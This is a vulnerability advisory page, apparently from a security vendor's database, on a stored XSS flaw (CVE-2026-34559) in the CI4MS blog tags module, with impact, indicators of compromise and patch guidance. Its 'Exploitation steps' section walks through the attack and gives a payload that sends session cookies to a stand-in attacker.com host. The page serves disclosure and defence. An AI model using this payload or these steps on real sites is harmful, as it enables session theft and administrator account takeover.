CVE-2026-34559: 
PHP vulnerability analysis and mitigation

Overview

CVE-2026-34559 is a stored DOM-based Cross-Site Scripting (XSS) vulnerability in CI4MS, a CodeIgniter 4-based CMS skeleton, affecting all versions up to and including 0.28.6.0. The flaw resides in the blog tags module, where user-controlled input is stored server-side without sanitization and later rendered unsafely across public tag pages and administrative interfaces. It was published on March 31, 2026, by researcher bugmithlegend and patched in version 0.31.0.0. The vulnerability carries a CVSS v3.1 base score of 9.1 (Critical) (Github Advisory, GitHub Security Advisory).

Technical details

The root cause is CWE-79 (Improper Neutralization of Input During Web Page Generation), specifically a stored/persistent XSS variant. The application performs no input sanitization or output encoding on the blog tag name field; values are stored directly in the database and later injected into page templates using unsafe DOM manipulation methods (e.g., .html(), innerHTML) without HTML entity encoding. An attacker with low-privilege access (sufficient to create or edit blog tags) can inject a JavaScript payload such as <img src=x onerror=alert(document.domain)> into the tag name field. The payload persists and executes automatically in the browsers of any user — including administrators — who views the affected endpoints (/backend/blogs/tags/ or /blog/{id}) (Github Advisory, GitHub Security Advisory).

Impact

Successful exploitation enables persistent execution of arbitrary JavaScript in the browsers of all users who view affected tag pages, including administrators. This can lead to full account takeover across all roles via session token theft, privilege escalation by targeting administrator sessions, unauthorized actions performed on behalf of victims, and redirection to malicious sites. The changed scope means the impact extends beyond the attacker's own session to affect the entire application and all its users (Github Advisory, GitHub Security Advisory).

Exploitability

A proof-of-concept (PoC) with step-by-step reproduction instructions and a video PoC are publicly available in the GitHub Security Advisory, demonstrating account takeover via the XSS payload (Github Advisory). The EPSS score is approximately 0.017–0.021%, indicating a low current probability of widespread exploitation. There is no evidence of active in-the-wild exploitation at this time, and the vulnerability is not listed in the CISA Known Exploited Vulnerabilities (KEV) catalog. Exploitation requires only low-privilege access (e.g., a registered user who can create or edit blog tags), lowering the barrier for abuse.

Exploitation steps

  1. Reconnaissance: Identify a CI4MS instance running version 0.28.6.0 or earlier. Confirm access to the blog tags management functionality with a low-privilege account.
  2. Craft payload: Prepare a malicious JavaScript payload, for example: <img src=x onerror=fetch('https://attacker.com/steal?c='+document.cookie)> to exfiltrate session cookies, or <img src=x onerror=alert(document.domain)> for basic PoC validation.
  3. Inject payload: Navigate to the Blog Tags management page (/backend/blogs/tags/), create or edit a tag, and insert the XSS payload into the tag name field. Save the tag.
  4. Trigger execution: The payload is now stored server-side. Any user — including administrators — who visits a public blog page (/blog/{id}) or the administrative tags interface will automatically execute the payload in their browser.
  5. Achieve objective: Capture the administrator's session cookie via the exfiltration endpoint, use it to hijack the session, and gain full administrative control of the application, enabling privilege escalation and full account takeover (Github Advisory, GitHub Security Advisory).

Indicators of compromise

  • Network: Unexpected outbound HTTP requests from victim browsers to external domains (e.g., attacker-controlled cookie-stealing endpoints) originating after visiting /backend/blogs/tags/ or /blog/{id} pages.
  • Logs: Web server access logs showing POST or GET requests to /backend/blogs/tags/ containing HTML/JavaScript tags (e.g., <img, <script, onerror=) in tag name parameters; repeated access to tag pages by unusual or new accounts shortly after tag creation.
  • Application Data: Blog tag records in the database containing raw HTML or JavaScript strings (e.g., <img src=x onerror=...>) in the tag name field rather than plain text.
  • Browser/Session: Unexpected session invalidation or new administrative sessions created from IP addresses not associated with legitimate administrators, potentially indicating session hijacking.

Mitigation and workarounds

The vendor has released a patch in version 0.31.0.0, which implements global input validation, enhanced CSRF token handling, and XSS protection across the application (GitHub Release). All users should upgrade to version 0.31.0.0 or later immediately. As interim mitigations, restrict blog tag creation and editing permissions to trusted administrators only, deploy a Web Application Firewall (WAF) with rules to detect and block common XSS payloads in input fields, and enforce HttpOnly and Secure flags on session cookies along with a strict Content Security Policy (CSP) header (Github Advisory).

Community reactions

The vulnerability was reported by researcher bugmithlegend and published by the CI4MS maintainer bertugfahriozer on March 31, 2026. Brief community mentions appeared on Mastodon and Bluesky shortly after disclosure, consistent with routine CVE notification activity. No significant vendor statements beyond the advisory or notable media coverage have been identified.

Additional resources


Source: This report was generated using AI

Related PHP vulnerabilities:

CVE ID

Severity

Score

Technologies

Component name

CISA KEV exploit

Has fix

Published date

CVE-2026-55224HIGH8.7
  • PHP logoPHP
  • mineadmin/mineadmin
NoYesSep 30, 2026
CVE-2026-103111HIGH7.6
  • MariaDB Server logoMariaDB Server
  • mariadb11.8-server
NoYesSep 30, 2026
GHSA-3q6v-r5mr-hxv8HIGH7.5
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
GHSA-97jj-33gv-5xf9MEDIUM6.1
  • PHP logoPHP
  • league/commonmark
NoYesSep 30, 2026
CVE-2026-104181MEDIUM5.4
  • PHP logoPHP
  • filament/filament
NoYesOct 01, 2026

Free Vulnerability Assessment

Benchmark your Cloud Security Posture

Evaluate your cloud security practices across 9 security domains to benchmark your risk level and identify gaps in your defenses.

Request assessment

Get a personalized demo

Ready to see Wiz in action?

"Best User Experience I have ever seen, provides full visibility to cloud workloads."
David EstlickCISO
"Wiz provides a single pane of glass to see what is going on in our cloud environments."
Adam FletcherChief Security Officer
"We know that if Wiz identifies something as critical, it actually is."
Greg PoniatowskiHead of Threat and Vulnerability Management